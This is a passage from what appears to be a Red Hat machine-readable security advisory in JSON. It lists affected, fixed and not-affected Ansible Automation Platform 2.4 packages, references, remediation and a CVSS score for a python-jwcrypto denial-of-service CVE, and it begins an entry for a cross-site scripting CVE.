"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
},
{
"cve": "CVE-2024-34064",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-05-07T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
